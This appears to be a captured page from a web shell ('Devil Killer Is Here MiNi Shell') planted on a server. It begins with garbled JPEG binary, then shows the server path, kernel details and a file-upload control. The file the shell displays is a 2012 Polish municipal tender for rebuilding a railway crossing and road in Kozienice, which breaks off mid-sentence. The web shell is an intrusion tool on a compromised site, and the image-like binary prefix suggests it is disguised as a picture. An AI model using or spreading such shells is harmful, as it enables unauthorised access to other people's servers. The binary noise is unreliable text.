JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/112818-N-2012.html

<p class="kh_header"><b>Kozienice: Przebudowa przejazdu kolejowego w ciągu ul. 11-go Listopada</b><br>
<b>Numer ogłoszenia: 112818 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa przejazdu kolejowego w ciągu ul. 11-go Listopada.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest:
Remont ul. 11-go Listopada na odcinku od granic miasta do ul. Pistowskiej w m. Aleksandrówka wraz z przebudową przejazdu kolejowego linii nr 77 Janików - Świerże Górne km 4,266. Zakres robót obejmuje:
.	budowę nawierzchni bitumicznej ,
.	budowę poboczy,
.	budowę chodników,
.	budowę zjazdów indywidualnych,
.	założenie trawników,
.	przebudowę przejazdu kolejowego,
.	stałą organizację ruchu,
.	wymianę słupów oświetlenia ulicznego.
W szczególności zadanie przewiduje:  

1.- roboty  ziemne i przygotowawcze :
-	roboty pomiarowe,
-	karczowanie zagajników, wywożenie gałązi,
-	usunięcie warstwy ziemi urodzajnej,
-	roboty rozbiórkowe - krawężników wraz z ławami,  nawierzchni z płyt drogowych betonowych wraz z wywiezieniem,  
-	frezowanie nawierzchni bitumicznej,
-	roboty ziemne,
2.- budowa jezdni:
-	wykonanie koryta na poszerzeniach ,
-	warstwa odcinająca,
-	podbudowa z kruszywa łamanego,
-	czyszczenie oraz skropienie nawierzchni drogowej asfaltem,
-	podbudowa z mieszanki mineralno-bitumicznej,
-	wyrównanie istniejącej podbudowy mieszanką mineralno-asfaltową,
-	czyszczenie nawierzchni drogowej i skropienie asfaltem,
-	nawierzchnia z mieszanek mineralno-bitumicznych,
-	krawężniki betonowe na podsypce cem. piaskowej wraz z ławą betonową z oporem,
-	utwardzenie poboczy nawierzchni z tłucznia kamiennego,
-	regulacja pionowa studzienek i wpustów,
-	pierśćienie odciążające z żeliwnymi włazami oraz płyty żelbetowe ,
3.- budowa zjazdów:
-	wykonanie koryta,
-	warstwa odcinająca,
-	podbudowa z kruszywa łamengo,
-	nawierzchnia z kostki brukowej betonowej szarej gr. 8 cm,
-	krawężniki betonowe na podsypce piaskowej wraz z ławą betonową,
-	nawierzchnia z tłucznia kamiennego,
4.- budowa chodników:
-	profilowanie i zagęszczenie podłoża,
-	nawierzchnia z kostki brukowej betonowej kolorowej gr 6 cm,
-	chodnik z płyt betonowych z wypustkami,
-	obrzeża betonowe kolorowe,
5.- tereny zieleni:
-	przekopanie gleby,
-	rozścielanie ziemi urodzajnej,
-	wykonanie trawników dywanowych ,
6.- remont przejazdu kolejowego:
-	rozebranie  nawierzchni z płyt żelbetowych w torowiskach,
-	nawierzchnia z płyt żelbetowych w torowiskach,
7.- organizacja ruchu:
-	rozebranie słupków do znaków, wraz zdemontażem tablic,
-	montaż słupków do znaków drogowych,
-	przymocowanie tablic znaków drogowych,
-	malowanie linii na jezdni,
-	montaż poręczy ochronnych,
8.- zabezpieczenie kabla telekomunikacyjnego szlakowego i pomiary kontrolne- odkopanie i zabezpieczenie dzielonymi osłonami rurowymi grubościennymi  oraz ułożenie obok rurę rezerwową o profilu zamkniętym średnicy min. 110mm, końce rur powinny wystawać min. po 0,5m poza obrys jezdni i chodnika, kable w rurach należy umieścić  na głębokości min. 1,2m od pow. ,przed rozpoczęciem i po zakończeniu prac należy wykonać pomiary kontrolne kabla (uzgodnienia - znak:LOTS3h-508-105-11 z dnia 25.08.2011r., LOTS3h-508-150-11 z dnia 10.11.2011r.), powiadmienie 14 dni przed przystąpieniem do robót o pracach TK  Telekom Sp. z o.o., ponoszenie kosztów związanych ze stratami  spowodowanymi awarią kabla podczas robót ( koszty usunięcia awarii, i odszkodowań),
9.- wymiana słupów oświetleniowych - 2 słupy betonowe przy przejeździe wraz z oprawami zdemontować, oprawy złomować a zużyte źródła światła zutylizować, od słupów odłączyć linie zasilające napowietrzną i kablową. Na miejsce słupa zasilanego linia napowietrzną zbudować słup ŻN-10 z ustojami U1 (belki ustojowe B-80 2 szt), uchwyt końcowy SO 80, śrubę hakową, wysięgnik do lampy WO-1 mocowany uchwytami wysięgnika UW-1. Zacisk odgałęźny przebijający izolację SL24, skrzynkę z zabezpieczeniem SV192511. Do słupa wprowadzić kabel i zamocować napowietrzną linię zasilającą. Obok słupa wykonać uziom prętowy wbijany h=6m i słup uziemić. Na miejscu słupa zasilanego linią kablową zabudować słup WZ-9 wyposażony w tabliczkę zaciskową i wysięgnik h=1m. Do tabliczki zaciskowej podłączyć ponownie kabel zasilający. Na słupach zamontować oparwy z sodowymi źródłami światła 150W . Oprawy zasilać przewodami YDY 2x1,5mm2 .
10.- kompleksową obsługę geodezyjną zachowując postanowienia  Roz.M.G.P.iB. z dn.21.02.1995r (Dz. U. nr 25 poz.133) w sprawie  rodzaju i zakresu  opracowań   geodezyjno-kartograficznych oraz czynności geodezyjnych   obowiązujących  w  budownictwie, w tym czynności geodezyjne obowiązujące w budownictwie, w tym:
 -     prace    przygotowawcze,   
-      prace  pomiarowe  poparte  wpisami  w  dzienniku  budowy, 
-      bieżąca obsługa geodezyjna budowy, 
-      na żądanie wykonawcy i inwestora kontrolne pomiary elementów inwestycji, 
-      geodezyjna inwentaryzacja robót ulegających zakryciu oraz geodezyjna sytuacyjno-wysokościowa inwentaryzacja powykonawcza, wraz z podziałem szczegółowym na  rodzaj  i ilości wykonanych robot w podziale na branże - wg wymagań inspektora nadzoru lub Zamawiającego,
-	dokumentacja geodezyjno - kartograficzna obiektów w formie i zakresie przewidzianym  wymaganymi przepisami obowiązującymi na dzień  odbioru zadania w podziale na części dotyczące przebiegu inwestycji przez teren PKP  zgodnie z pkt. 7,8 i 9 Opinii nr 23-2012 KZUDP i pozostałego terenu objętego robotami zgodnie z wymaganiami PKP i  Zamawiającego,
-	przekazanie zamawiającemu 5 kompletów  kopii mapy powstałej w wyniku geodezyjnej inwentaryzacji powykonawczej zarejestrowanej w Starostwie wraz z wykazem określającym  ilości wykonanych robót z podziałem na branże, rodzaje robót, średnice w zakresie terenu objętego robotami bez terenu PKP,
-	wykonanie czynności geodezyjnych w okresie rękojmi i gwarancji dla robót budowlanych,
11.- wykonanie robót pomocniczych, w tym:
.	nieodpłatne przeglądy i usuwanie uszkodzeń wynikających z wad produkcyjnych lub zastosowania wadliwych materiałów,
.	poniesienie kosztów związanych z oznakowaniem terenu budowy zgodnym z przepisami, 
.	opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzyskaniem wymaganych  zezwoleń, poniesienie kosztów związanych z zajęciem pasa drogowego dróg gminnych i terenów PKP oraz oznakowaniem ich na czas prowadzenia robót zgodnym z przepisami,
.	ponoszenie kosztów kolejowego nadzoru (pismo znak: N13li-614-157-11 z 14.12.2011r.),
.	wywózka materiałów odpadowych (gruzu, gałęzi, karpin, dłużyc oraz innych) pochodzących z placu budowy  i ich utylizacja, 
.	wykonanie przez uprawnione laboratoria  pomiarów i badań w czasie realizacji inwestycji, potwierdzających jakość wykonanych robót,
.	przejęcie na siebie odpowiedzialności za szkody wobec osób trzecich w  związku z prowadzonymi robotami, 
.	powiadomienie z 2 tygodniowym wyprzedzeniem właścicieli urządzeń podziemnych , naziemnych i podziemnych oraz mieszkańców sąsiednich posesji o terminie prowadzenia robót i ewentualnych niedogodnościach z nimi zwiazanych (kopię powiadomień należy przekazać Zamawiającemu),
.	uporządkowanie terenu bezpośrednio przylegającego do placu budowy,
.	prace na terenie kolejowym wraz z przejazdem kolejowym należy prowadzić pod nadzorem przedstawiciela Sekcji Eksploatacji  Radom i według regulaminu PKP, powiadamiając przed rozpoczęciem robót Zakład  Linii Kolejowych w Skarżysu-Kamiennej w celu wydania zgody na wejście na teren kolejowy i przekazania placu budowy,
.	roboty na terenie kolejowym wraz z przejazdem kolejowym należy wykonać w  1 cyklu roboczym (w razie konieczności wykonawca zobowiązany będzie do wykonania robót przy zatrzymaniu ruchu pociągów - w uzgodnionym z PKP czasie)
.	na etapie przekazania terenu kolejowego,  wykonawca jest zobowiązany do wykonania żądań PKP w tym do oznakowania czasowego ostrzegawczego linii kolejowej na odcinku prowadzonych robót wraz z pokryciem jego kosztów,
.	wykonawca robót  zobowiązany jest do przyjęcia regulaminu wydanego prze PKP  a obowiązującego w trakcie prowadzenia robót  na terenie PKP wraz z przejazdem,
.	wykonawca musi zachować zalecenia Kolejowego Zespołu Uzgadniania Dokumentacji Projektowej N17-WG8-655-058-12-AP, w tym:
- zachować kolejową skrajnię budowli,
- zapewnić nadzór techniczny nad robotami z branżowych jednostek kolejowych i miejskich,
- urządzenia kolejowe nie mogą być naruszane,
		- teren po zakończeniu prac należy doprowadzić do stanu pierwotnego,
		- przebieg linii kolejowych przez grunty PKP należy trwale oznakować,
		- roboty należy wykonać w uzgodnieniu z zarządzającym terenem PKP,
- ochronę punktów osnowy geodezyjnej, a w przypadku kilizji poinformować o tym fakcie PKP S.A. celem ponownego uzgodnienia projektu,
- wykonawca zapewnia wykonanie inwentaryzacji robót ulegających zakryciu oraz geodezyjną sytuacyjno-wysokościową inwentaryzację powykonawczą,
- wykonawca zapewnia dokumentację geodezyjno-kartograficzną i uzgodnienia wynikające z obowiązujących przepisów, zgodnie z pkt. 8 uzgodnienia KZUDP.
UWAGA - przy obliczeniu ceny oferty należy uwzględnić  zakres robót szczegółowo określony w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót i siwz, w tym roboty nie ujęte w przedmiarze robót, tj:
-	wymianę słupów oświetleniowych (przewidziany zakres robót opisano w pkt. 6.9. rozdziału II siwz),
-	zabezpieczenie kabla telekomunikacyjnego (przewidziany zakres robót opisano w pkt. 6.8. rozdziału II siwz),
-	regulację wysokościową uzbrojenia terenu w obrębie inwestycji tj. 2 włazów i 1 studni (płyta i pierścień plus właz dla studni betonowej fi 1200 mm).
W ramach zadania wykonawca jest zobowiązany do wykonania robót pomocniczych, niezbędnych do wykonania i eksploatacji zadania,  w tym do :        
- wykonania robót towarzyszących związanych z inwestycją - robót  związanych z przygotowaniem placu budowy,  robót związanych z utrudnieniami wynikłymi w trakcie realizacji zadania - w przypadku wystąpienia  utrudnień   - ich likwidacja - demontaż oraz  wykonania robót odtworzeniowych po likwidacji utrudnień - w tym urządzeń kolidujących  z przedmiotem umowy , uporządkowanie obszaru objętego robotami oraz sąsiadującego z pozostałości po prowadzonych robotach, na bieżąco porządkowanie  teren po  wykonanych  robotach , zabezpieczenia przed niekorzystnymi warunkami atmosferycznymi w sposób skuteczny obiektu wraz z jego poszczególnymi elementami, 

- wykonania przez uprawnione laboratoria  pomiarów i badań w czasie realizacji inwestycji, potwierdzających jakość wykonanych robót, zgodnie z wymaganiami stawianymi przez obowiązujące w dacie przyjęcia przedmiotu umowy normy  i  inne przepisy podmiotowe,

- prowadzenie robót w sposób nie kolidujący z funkcjonowaniem terenów sąsiadujących z inwestycją, 

- przez cały czas realizacji inwestycji właściwe oznakowanie prowadzonych robót, zgodnie z obowiązującymi przepisami.
Do obowiązku Wykonawcy należy: 
.	urządzenie i zabezpieczenie obszaru objętego robotami ponosząc koszty z tym związane - w tym zużycia   energii elektrycznej i wody, wykonania i utrzymania na swój koszt wszelkich osłon, ogrodzenia, oznakowania i innych usług które może potrzebować do wykonania robót objętych niniejszą umową, 
.	niezwłoczne wykonanie robót koniecznych ze względu na bezpieczeństwo  lub zabezpieczenie   przed awarią, 
.	prowadzenie robót w sposób nie powodujący zagrożenia bezpieczeństwa ludzi i mienia, nie  powodując   szkodliwych  zmian w środowisku naturalnym,
.	pełna odpowiedzialności za obszar objęty robotami z chwilą jego przejęcia,
.	przyjęcie na siebie odpowiedzialności za szkody  wobec osób trzecich w związku z prowadzonymi robotami,  
.	podejmowanie wszelkich środków zapobiegawczych wymaganych przez rzetelną praktykę budowlaną oraz aktualne okoliczności, aby zabezpieczyć prawa właścicieli posesji sąsiadujących z    terenem budowy,
.	zapoznanie się z umiejscowieniem wszystkich istniejących sieci przed rozpoczęciem jakichkolwiek wykopów lub innych prac mogących uszkodzić istniejące uzbrojenie,
.	zabezpieczenie teren budowy przejmując skutki finansowe z tego tytułu, w tym   zabezpieczenie  go pod względem bhp , wykonanie potrzebnych miejsc składowania materiałów  we własnym zakresie i na własny koszt, po zakończeniu robót uporządkowanie obszaru objętego robotami i terenu z nim bezpośrednio sąsiadującego oraz miejsc składowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt. 6 ustawy PZP do wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.23.31.24-4, 45.23.32.22-1, 45.11.27.10-5, 45.23.32.90-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia - zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zamówienie polegające na wykonaniu robót budowlanych których przedmiotem była budowa lub przebudowa lub remont jezdni drogi-ulicy lub parkingu lub zjazdów lub ciągów pieszo-jezdnych lub chodników i załączy dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełnienia w-w warunku dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać, że w-w warunek wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia -zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej 1 osobą która będzie pełnić funkcję kierownika budowy , posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności drogowej lub konstrukcyjno-budowlanej co najmniej w ograniczonym zakresie  w rozumieniu przepisów ustawy z dn. 7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156, poz. 1118 ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednich przepisów obowiązujących na  terenie kraju z którego pochodzi dana osoba, które  w zakresie objetym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w ww. specjalności.
Ocena spełnienia ww warunku dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać, że ww warunek wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający zobowiązany jest do przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt. 9.2 aib siwz,
2)	stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,

3)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,

4) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa  w pkt. 9.4 siwz, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia pkt. 9.4.2  siwz stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian postanowień zawartej umowy w stosunku do treści oferty:
1.Terminu wykonania zadania w następujących przypadkach :
1.1.Niesprzyjających warunków  pogodowych.
1.2.Niedopełnieniu przez Zamawiającego jego obowiązków wynikających 
              z umowy.
1.3.Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu 
      zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te  
      zmiany są korzystne dla Zamawiającego.
1.4.Z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed  
              zawarciem umowy przez doświadczonego wykonawcę, robót.
1.5.Z powodu okoliczności siły wyższej, np. wystapienia zdarzenia losowego 
              wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z 
              pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu lub 
              grożącego powstaniem szkody w znacznych rozmiarach.
1.6.Z powodu stanu wyższej konieczności, powodującego podjęcie działań w celu 
              uchylenia bezpośredniego niebezpieczeństwa grożącego dobru społecznemu lub 
              jakiemukolwiek dobru jednostki,
1.7.Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to 
